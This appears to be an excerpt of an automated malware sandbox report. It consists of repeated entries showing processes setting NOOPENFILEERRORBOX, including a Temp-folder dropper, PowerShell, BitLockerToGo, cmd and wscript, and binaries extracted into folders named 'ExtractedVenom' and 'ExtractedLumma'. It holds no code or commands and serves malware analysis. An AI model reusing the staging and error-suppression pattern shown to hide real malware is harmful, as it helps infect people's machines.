Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
